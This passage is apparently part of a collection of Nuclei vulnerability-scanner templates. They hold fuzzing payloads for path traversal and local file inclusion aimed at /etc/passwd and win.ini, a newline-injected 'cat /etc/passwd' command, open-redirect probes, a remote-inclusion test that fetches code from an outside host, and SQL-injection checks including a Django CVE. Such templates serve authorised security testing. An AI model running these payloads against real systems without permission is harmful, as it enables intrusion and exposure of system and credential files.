| fuzz: "../../../../../../../../../../../../../../../" 15 | fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f" 16 | fuzz_hex_unicode: 
"%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f" 17 | fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF" 18 | fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF" 19 | fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../" 20 | fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\' 21 | fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../" 22 | 23 | http: 24 | - pre-condition: 25 | - type: dsl 26 | dsl: 27 | - 'method == "GET"' 28 | 29 | payloads: 30 | pathtraversal: 31 | - '{{fuzz}}etc/passwd' 32 | - '{{fuzz}}windows/win.ini' 33 | - '/etc/passwd%00.jpg' 34 | - 'c:/windows/win.ini%00.jpg' 35 | - '{{fuzz}}etc/passwd%00.jpg' 36 | - '{{fuzz}}windows/win.ini%00.jpg' 37 | - '{{fuzz_urlx2_encode}}etc%252fpasswd' 38 | - '{{fuzz_urlx2_encode}}windows%252fwin.ini' 39 | - '{{fuzz_hex_unicode}}etc%u002fpasswd' 40 | - '{{fuzz_hex_unicode}}windows%u002fwin.ini' 41 | - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd' 42 | - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini' 43 | - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd' 44 | - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini' 45 | - '{{fuzz_bypass_replace}}etc/passwd' 46 | - '{{fuzz_bypass_replace}}windows/win.ini' 47 | - '{{fuzz_bypass_replace_windows}}windows\win.ini' 48 | - 
'{{fuzz_bypass_waf_regx}}etc/passwd' 49 | - '{{fuzz_bypass_waf_regx}}windows/win.ini' 50 | - './web.config' 51 | - '../web.config' 52 | - '../../web.config' 53 | - './WEB-INF/web.xml' 54 | - '../WEB-INF/web.xml' 55 | - '../../WEB-INF/web.xml' 56 | 57 | fuzzing: 58 | - part: query 59 | mode: single 60 | keys: 61 | - cat 62 | - dir 63 | - action 64 | - board 65 | - date 66 | - detail 67 | - file 68 | - download 69 | - path 70 | - folder 71 | - prefix 72 | - include 73 | - page 74 | - inc 75 | - locate 76 | - show 77 | - doc 78 | - site 79 | - type 80 | - view 81 | - content 82 | - document 83 | - layout 84 | - mod 85 | - conf 86 | - url 87 | - img 88 | - image 89 | - images 90 | fuzz: 91 | - "{{pathtraversal}}" 92 | 93 | - part: query 94 | mode: single 95 | values: 96 | - "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$" 97 | fuzz: 98 | - "{{pathtraversal}}" 99 | 100 | stop-at-first-match: true 101 | matchers-condition: or 102 | matchers: 103 | - type: regex 104 | part: body 105 | regex: 106 | - 'root:.*?:[0-9]*:[0-9]*:' 107 | 108 | - type: word 109 | part: body 110 | words: 111 | - 'for 16-bit app support' 112 | 113 | - type: regex 114 | part: body 115 | regex: 116 | - '()' 117 | 118 | - type: regex 119 | part: body 120 | regex: 121 | - '()' 122 | # digest: 490a0046304402204f25e304b713186e620bc4448b9277a9874b77763bbf31e8b099b97bbcab85c702207be12ef346bdc11f03b226da7811a9f0fccbf6dc7e818020cdd707dade3c7508:922c64590222798bb761d5b6d8e72950 123 | -------------------------------------------------------------------------------- /lfi/linux-lfi-fuzz.yaml: -------------------------------------------------------------------------------- 1 | id: linux-lfi-fuzz 2 | 3 | info: 4 | name: Local File Inclusion - Linux 5 | author: DhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt 9 | - 
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion 10 | metadata: 11 | max-request: 46 12 | tags: lfi,dast,linux 13 | 14 | http: 15 | - pre-condition: 16 | - type: dsl 17 | dsl: 18 | - 'method == "GET"' 19 | 20 | payloads: 21 | nix_fuzz: 22 | - '/etc/passwd' 23 | - '../../etc/passwd' 24 | - '../../../etc/passwd' 25 | - '/../../../../etc/passwd' 26 | - '../../../../../../../../../etc/passwd' 27 | - '../../../../../../../../etc/passwd' 28 | - '../../../../../../../etc/passwd' 29 | - '../../../../../../etc/passwd' 30 | - '../../../../../etc/passwd' 31 | - '../../../../etc/passwd' 32 | - '../../../etc/passwd' 33 | - '../../../etc/passwd%00' 34 | - '../../../../../../../../../../../../etc/passwd%00' 35 | - '../../../../../../../../../../../../etc/passwd' 36 | - '/../../../../../../../../../../etc/passwd^^' 37 | - '/../../../../../../../../../../etc/passwd' 38 | - '/./././././././././././etc/passwd' 39 | - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' 40 | - '..\..\..\..\..\..\..\..\..\..\etc\passwd' 41 | - '/..\../..\../..\../..\../..\../..\../etc/passwd' 42 | - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' 43 | - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' 44 | - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' 45 | - '%252e%252e%252fetc%252fpasswd' 46 | - '%252e%252e%252fetc%252fpasswd%00' 47 | - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' 48 | - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' 49 | - '....//....//etc/passwd' 50 | - '..///////..////..//////etc/passwd' 51 | - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' 52 | - '%0a/bin/cat%20/etc/passwd' 53 | - '%00/etc/passwd%00' 54 | - '%00../../../../../../etc/passwd' 55 | - '/../../../../../../../../../../../etc/passwd%00.jpg' 56 | - '/../../../../../../../../../../../etc/passwd%00.html' 57 | - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' 58 | - 
'/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 59 | - '\\'/bin/cat%20/etc/passwd\\'' 60 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 61 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 62 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 63 | - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 64 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 65 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 66 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 67 | - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' 68 | 69 | fuzzing: 70 | - part: query 71 | type: replace # replaces existing parameter value with fuzz payload 72 | mode: multiple # replaces all parameters value with fuzz payload 73 | fuzz: 74 | - '{{nix_fuzz}}' 75 | 76 | stop-at-first-match: true 77 | matchers: 78 | - type: regex 79 | part: body 80 | regex: 81 | - 'root:.*:0:0:' 82 | # digest: 4a0a0047304502206c53383c7a148e9311173ee5bb2bf1177386db240eff9b2f6d8256e88cbf5f1a022100ddb39020f7957af58c62c6ec59c7094277c8193e4ab089cd4cce994da4d140d8:922c64590222798bb761d5b6d8e72950 83 | -------------------------------------------------------------------------------- /lfi/windows-lfi-fuzz.yaml: -------------------------------------------------------------------------------- 1 | id: windows-lfi-fuzz 2 | 3 | info: 4 | name: Local File Inclusion - Windows 5 | author: pussycat0x 6 | severity: high 7 | metadata: 8 | max-request: 39 9 | tags: lfi,windows,dast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | win_fuzz: 19 | - '\WINDOWS\win.ini' 20 | - '\WINDOWS\win.ini' 21 | - '\WINDOWS\win.ini%00' 22 | - '\WINNT\win.ini' 23 | - '\WINNT\win.ini%00' 24 | - 'windows/win.ini%00' 25 | - '../../windows/win.ini' 26 | - '....//....//windows/win.ini' 27 | - 
'/../../../../../../../../../../../../../../../../&location=Windows/win.ini' 28 | - '../../../../../windows/win.ini' 29 | - '/..///////..////..//////windows/win.ini' 30 | - '/../../../../../../../../../windows/win.ini' 31 | - './../../../../../../../../../../windows/win.ini' 32 | - '/...\...\...\...\...\...\...\...\...\windows\win.ini' 33 | - '/.../.../.../.../.../.../.../.../.../windows/win.ini' 34 | - '/..../..../..../..../..../..../..../..../..../windows/win.ini' 35 | - '/....\....\....\....\....\....\....\....\....\windows\win.ini' 36 | - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' 37 | - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' 38 | - '..%2f..%2f..%2f..%2fwindows/win.ini' 39 | - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' 40 | - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' 41 | - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' 42 | - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' 43 | - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' 44 | - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' 45 | - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' 46 | - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' 47 | - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' 48 | - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' 49 | - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' 50 | - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' 51 | - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' 52 | - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' 53 | - 
'/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' 54 | - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' 55 | - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' 56 | - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' 57 | - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' 58 | 59 | fuzzing: 60 | - part: query 61 | type: replace # replaces existing parameter value with fuzz payload 62 | mode: multiple # replaces all parameters value with fuzz payload 63 | fuzz: 64 | - '{{win_fuzz}}' 65 | 66 | stop-at-first-match: true 67 | matchers: 68 | - type: word 69 | part: body 70 | words: 71 | - "bit app support" 72 | - "fonts" 73 | - "extensions" 74 | condition: and 75 | # digest: 4a0a00473045022100a6f8ee294173fc629f71ec9dfe9c61ad2fbec55dce015a895d126264c15db4f902204dd04d624e3dd7f4bc7cec991d5d87df7c33db24bf681c23b6f18564abfbf644:922c64590222798bb761d5b6d8e72950 76 | -------------------------------------------------------------------------------- /redirect/open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: open-redirect 2 | 3 | info: 4 | name: Open Redirect Detection 5 | author: princechaddha,AmirHossein Raeisi 6 | severity: medium 7 | metadata: 8 | max-request: 1 9 | tags: redirect,dast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | redirect: 19 | - "oast.me" 20 | 21 | fuzzing: 22 | - part: query 23 | mode: single 24 | keys: 25 | - AuthState 26 | - URL 27 | - _url 28 | - callback 29 | - 
checkout 30 | - checkout_url 31 | - content 32 | - continue 33 | - continueTo 34 | - counturl 35 | - data 36 | - dest 37 | - dest_url 38 | - destination 39 | - dir 40 | - document 41 | - domain 42 | - done 43 | - download 44 | - feed 45 | - file 46 | - file_name 47 | - file_url 48 | - folder 49 | - folder_url 50 | - forward 51 | - from_url 52 | - go 53 | - goto 54 | - host 55 | - html 56 | - http 57 | - https 58 | - image 59 | - image_src 60 | - image_url 61 | - imageurl 62 | - img 63 | - img_url 64 | - include 65 | - langTo 66 | - load_file 67 | - load_url 68 | - login_to 69 | - login_url 70 | - logout 71 | - media 72 | - navigation 73 | - next 74 | - next_page 75 | - open 76 | - out 77 | - page 78 | - page_url 79 | - pageurl 80 | - path 81 | - picture 82 | - port 83 | - proxy 84 | - r 85 | - r2 86 | - redir 87 | - redirect 88 | - redirectUri 89 | - redirectUrl 90 | - redirect_to 91 | - redirect_uri 92 | - redirect_url 93 | - reference 94 | - referrer 95 | - req 96 | - request 97 | - ret 98 | - retUrl 99 | - return 100 | - returnTo 101 | - return_path 102 | - return_to 103 | - return_url 104 | - rt 105 | - rurl 106 | - show 107 | - site 108 | - source 109 | - src 110 | - target 111 | - to 112 | - u 113 | - uri 114 | - url 115 | - val 116 | - validate 117 | - view 118 | - window 119 | - back 120 | - cgi 121 | - follow 122 | - home 123 | - jump 124 | - link 125 | - location 126 | - menu 127 | - move 128 | - nav 129 | - orig_url 130 | - out_url 131 | - query 132 | - auth 133 | - callback_url 134 | - confirm_url 135 | - destination_url 136 | - domain_url 137 | - entry 138 | - exit 139 | - forward_url 140 | - go_to 141 | - goto_url 142 | - home_url 143 | - image_link 144 | - load 145 | - logout_url 146 | - nav_to 147 | - origin 148 | - page_link 149 | - redirect_link 150 | - ref 151 | - referrer_url 152 | - return_link 153 | - return_to_url 154 | - source_url 155 | - target_url 156 | - to_url 157 | - validate_url 158 | - DirectTo 159 | - relay 160 | 161 | fuzz: 162 | - 
"https://{{redirect}}" 163 | 164 | - part: query 165 | mode: single 166 | values: 167 | - "https?://" # Replace any parameter value that already holds an http(s) URL with the OAST host 168 | fuzz: 169 | - "https://{{redirect}}" 170 | 171 | stop-at-first-match: true 172 | matchers-condition: and 173 | matchers: 174 | - type: regex 175 | part: header 176 | regex: 177 | - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - the Location host must end in oast.me (subdomain or user@ prefixes allowed), so a target that only reflects the payload into a path or query string is not reported 178 | 179 | - type: status # header-based redirects only; 303/308 responses and meta-refresh or JavaScript redirects are not detected 180 | status: 181 | - 301 182 | - 302 183 | - 307 184 | # digest: 4a0a00473045022100d5d09d72be494c1eb95fd874c9d31cee1ac9e14d7d578419fa0a8298c9f8ca9002202e00bd1843e97bb9160eb898cea0a3301321571d4d65ea7c4bce6b90f9dc82fa:922c64590222798bb761d5b6d8e72950 185 | -------------------------------------------------------------------------------- /rfi/generic-rfi.yaml: -------------------------------------------------------------------------------- 1 | id: generic-rfi 2 | 3 | info: 4 | name: Generic Remote File Inclusion 5 | author: m4lwhere 6 | severity: high 7 | reference: 8 | - https://www.invicti.com/learn/remote-file-inclusion-rfi/ 9 | metadata: 10 | max-request: 1 11 | tags: rfi,dast,oast 12 | 13 | http: 14 | - pre-condition: 15 | - type: dsl 16 | dsl: 17 | - 'method == "GET"' 18 | 19 | payloads: 20 | rfi: 21 | - "https://rfi.nessus.org/rfi.txt" 22 | 23 | fuzzing: 24 | - part: query 25 | mode: single 26 | fuzz: 27 | - "{{rfi}}" 28 | 29 | stop-at-first-match: true 30 | matchers: 31 | - type: word 32 | part: body # Confirms the PHP was executed: the marker is expected only when the target fetched rfi.nessus.org and ran the included file, so blocked egress or an unreachable third-party host gives a silent negative 33 | words: 34 | - "NessusCodeExecTest" 35 | # digest: 490a00463044022029d2873c4bd52bc2237f5807f6053de597738e331d83ff8661e78b54b9f8eabc02200aef90a617b1a1997f782d347cdea43e3cba3e453b60aa77148a0632bade8d7c:922c64590222798bb761d5b6d8e72950 36 | -------------------------------------------------------------------------------- /sqli/cves/CVE-2022-34265.yaml: -------------------------------------------------------------------------------- 1 | id: 
CVE-2022-34265 2 | 3 | info: 4 | name: Django - SQL injection 5 | author: princechaddha 6 | severity: critical 7 | description: | 8 | An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. 9 | reference: 10 | - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 11 | - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 12 | - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ 13 | - https://docs.djangoproject.com/en/4.0/releases/security/ 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 16 | cvss-score: 9.8 17 | cve-id: CVE-2022-34265 18 | cwe-id: CWE-89 19 | tags: sqli,dast,vulhub,cve,cve2022,django 20 | 21 | variables: 22 | rand_string: '{{rand_text_alpha(15, "abc")}}' 23 | 24 | http: 25 | - method: GET 26 | path: 27 | - "{{BaseURL}}" 28 | 29 | fuzzing: 30 | - part: query 31 | fuzz: 32 | - "test'{{rand_string}}" 33 | 34 | matchers-condition: and 35 | matchers: 36 | - type: word 37 | part: body 38 | words: 39 | - 'syntax error at or near "{{rand_string}}"' 40 | - 'LINE 1: SELECT DATE_TRUNC' 41 | condition: and 42 | 43 | - type: status 44 | status: 45 | - 500 46 | -------------------------------------------------------------------------------- /sqli/error-based-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: sqli-error-based 2 | 3 | info: 4 | name: Error based SQL Injection 5 | author: geeknik,pdteam 6 | severity: critical 7 | description: | 8 | Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, 9 | or to override valuable ones, or even to execute dangerous system level commands on the database host. 
10 | This is accomplished by the application taking user input and combining it with static parameters to build an SQL query. 11 | metadata: 12 | max-request: 3 13 | tags: sqli,error,dast 14 | 15 | http: 16 | - pre-condition: 17 | - type: dsl 18 | dsl: 19 | - 'method == "GET"' 20 | 21 | payloads: 22 | injection: 23 | - "'" 24 | - "\"" 25 | - ";" 26 | 27 | fuzzing: 28 | - part: query 29 | type: postfix 30 | fuzz: 31 | - "{{injection}}" 32 | 33 | stop-at-first-match: true 34 | matchers-condition: and 35 | matchers: 36 | - type: word 37 | part: body 38 | words: 39 | - "Adminer" 40 | negative: true 41 | # False-positive guard: Adminer is a database admin UI that legitimately prints raw driver errors, so any page mentioning it is excluded before the error regexes below are evaluated 42 | 43 | - type: regex 44 | regex: 45 | # MySQL 46 | - "SQL syntax.*?MySQL" 47 | - "Warning.*?\\Wmysqli?_" 48 | - "MySQLSyntaxErrorException" 49 | - "valid MySQL result" 50 | - "check the manual that (corresponds to|fits) your MySQL server version" 51 | - "Unknown column '[^ ]+' in 'field list'" 52 | - "MySqlClient\\." 53 | - "com\\.mysql\\.jdbc" 54 | - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" 55 | - "Pdo[./_\\\\]Mysql" 56 | - "MySqlException" 57 | - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" 58 | # MariaDB 59 | - "check the manual that (corresponds to|fits) your MariaDB server version" 60 | # Drizzle 61 | - "check the manual that (corresponds to|fits) your Drizzle server version" 62 | # MemSQL 63 | - "MemSQL does not support this type of query" 64 | - "is not supported by MemSQL" 65 | - "unsupported nested scalar subselect" 66 | # PostgreSQL 67 | - "PostgreSQL.*?ERROR" 68 | - "Warning.*?\\Wpg_" 69 | - "valid PostgreSQL result" 70 | - "Npgsql\\." 71 | - "PG::SyntaxError:" 72 | - "org\\.postgresql\\.util\\.PSQLException" 73 | - "ERROR:\\s\\ssyntax error at or near" 74 | - "ERROR: parser: parse error at or near" 75 | - "PostgreSQL query failed" 76 | - "org\\.postgresql\\.jdbc" 77 | - "Pdo[./_\\\\]Pgsql" 78 | - "PSQLException" 79 | # Microsoft SQL Server 80 | - "Driver.*? SQL[\\-\\_\\ ]*Server" 81 | - "OLE DB.*? 
SQL Server" 82 | - "\\bSQL Server[^<"]+Driver" 83 | - "Warning.*?\\W(mssql|sqlsrv)_" 84 | - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" 85 | - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" 86 | - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 87 | - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" 88 | - "\\[SQL Server\\]" 89 | - "ODBC SQL Server Driver" 90 | - "ODBC Driver \\d+ for SQL Server" 91 | - "SQLServer JDBC Driver" 92 | - "com\\.jnetdirect\\.jsql" 93 | - "macromedia\\.jdbc\\.sqlserver" 94 | - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" 95 | - "com\\.microsoft\\.sqlserver\\.jdbc" 96 | - "Pdo[./_\\\\](Mssql|SqlSrv)" 97 | - "SQL(Srv|Server)Exception" 98 | - "Unclosed quotation mark after the character string" 99 | # Microsoft Access 100 | - "Microsoft Access (\\d+ )?Driver" 101 | - "JET Database Engine" 102 | - "Access Database Engine" 103 | - "ODBC Microsoft Access" 104 | - "Syntax error \\(missing operator\\) in query expression" 105 | # Oracle 106 | - "\\bORA-\\d{5}" 107 | - "Oracle error" 108 | - "Oracle.*?Driver" 109 | - "Warning.*?\\W(oci|ora)_" 110 | - "quoted string not properly terminated" 111 | - "SQL command not properly ended" 112 | - "macromedia\\.jdbc\\.oracle" 113 | - "oracle\\.jdbc" 114 | - "Zend_Db_(Adapter|Statement)_Oracle_Exception" 115 | - "Pdo[./_\\\\](Oracle|OCI)" 116 | - "OracleException" 117 | # IBM DB2 118 | - "CLI Driver.*?DB2" 119 | - "DB2 SQL error" 120 | - "\\bdb2_\\w+\\(" 121 | - "SQLCODE[=:\\d, -]+SQLSTATE" 122 | - "com\\.ibm\\.db2\\.jcc" 123 | - "Zend_Db_(Adapter|Statement)_Db2_Exception" 124 | - "Pdo[./_\\\\]Ibm" 125 | - "DB2Exception" 126 | - "ibm_db_dbi\\.ProgrammingError" 127 | # Informix 128 | - "Warning.*?\\Wifx_" 129 | - "Exception.*?Informix" 130 | - "Informix ODBC Driver" 131 | - "ODBC Informix driver" 132 | - "com\\.informix\\.jdbc" 133 | - "weblogic\\.jdbc\\.informix" 134 | - "Pdo[./_\\\\]Informix" 135 | - "IfxException" 136 | # Firebird 137 | - "Dynamic SQL Error" 138 | - 
"Warning.*?\\Wibase_" 139 | - "org\\.firebirdsql\\.jdbc" 140 | - "Pdo[./_\\\\]Firebird" 141 | # SQLite 142 | - "SQLite/JDBCDriver" 143 | - "SQLite\\.Exception" 144 | - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" 145 | - "Warning.*?\\W(sqlite_|SQLite3::)" 146 | - "\\[SQLITE_ERROR\\]" 147 | - "SQLite error \\d+:" 148 | - "sqlite3.OperationalError:" 149 | - "SQLite3::SQLException" 150 | - "org\\.sqlite\\.JDBC" 151 | - "Pdo[./_\\\\]Sqlite" 152 | - "SQLiteException" 153 | # SAP MaxDB 154 | - "SQL error.*?POS([0-9]+)" 155 | - "Warning.*?\\Wmaxdb_" 156 | - "DriverSapDB" 157 | - "-3014.*?Invalid end of SQL statement" 158 | - "com\\.sap\\.dbtech\\.jdbc" 159 | - "\\[-3008\\].*?: Invalid keyword or missing delimiter" 160 | # Sybase 161 | - "Warning.*?\\Wsybase_" 162 | - "Sybase message" 163 | - "Sybase.*?Server message" 164 | - "SybSQLException" 165 | - "Sybase\\.Data\\.AseClient" 166 | - "com\\.sybase\\.jdbc" 167 | # Ingres 168 | - "Warning.*?\\Wingres_" 169 | - "Ingres SQLSTATE" 170 | - "Ingres\\W.*?Driver" 171 | - "com\\.ingres\\.gcf\\.jdbc" 172 | # FrontBase 173 | - "Exception (condition )?\\d+\\. Transaction rollback" 174 | - "com\\.frontbase\\.jdbc" 175 | - "Syntax error 1. Missing" 176 | - "(Semantic|Syntax) error [1-4]\\d{2}\\." 
177 | # HSQLDB 178 | - "Unexpected end of command in statement \\[" 179 | - "Unexpected token.*?in statement \\[" 180 | - "org\\.hsqldb\\.jdbc" 181 | # H2 182 | - "org\\.h2\\.jdbc" 183 | - "\\[42000-192\\]" 184 | # MonetDB 185 | - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" 186 | - "\\[MonetDB\\]\\[ODBC Driver" 187 | - "nl\\.cwi\\.monetdb\\.jdbc" 188 | # Apache Derby 189 | - "Syntax error: Encountered" 190 | - "org\\.apache\\.derby" 191 | - "ERROR 42X01" 192 | # Vertica 193 | - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" 194 | - "/vertica/Parser/scan" 195 | - "com\\.vertica\\.jdbc" 196 | - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" 197 | - "com\\.vertica\\.dsi\\.dataengine" 198 | # Mckoi 199 | - "com\\.mckoi\\.JDBCDriver" 200 | - "com\\.mckoi\\.database\\.jdbc" 201 | - "<REGEX_LITERAL>" 202 | # Presto 203 | - "com\\.facebook\\.presto\\.jdbc" 204 | - "io\\.prestosql\\.jdbc" 205 | - "com\\.simba\\.presto\\.jdbc" 206 | - "UNION query has different number of fields: \\d+, \\d+" 207 | # Altibase 208 | - "Altibase\\.jdbc\\.driver" 209 | # MimerSQL 210 | - "com\\.mimer\\.jdbc" 211 | - "Syntax error,[^\\n]+assumed to mean" 212 | # CrateDB 213 | - "io\\.crate\\.client\\.jdbc" 214 | # Cache 215 | - "encountered after end of query" 216 | - "A comparison operator is required here" 217 | # Raima Database Manager 218 | - "-10048: Syntax error" 219 | - "rdmStmtPrepare\\(.+?\\) returned" 220 | # Virtuoso 221 | - "SQ074: Line \\d+:" 222 | - "SR185: Undefined procedure" 223 | - "SQ200: No table " 224 | - "Virtuoso S0002 Error" 225 | - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" 226 | condition: or 227 | 228 | extractors: 229 | - type: regex 230 | name: mysql 231 | regex: 232 | - "SQL syntax.*?MySQL" 233 | - "Warning.*?\\Wmysqli?_" 234 | - "MySQLSyntaxErrorException" 235 | - "valid MySQL result" 236 | - "check the manual that (corresponds to|fits) your MySQL server version" 237 | - "Unknown column '[^ ]+' in 'field 
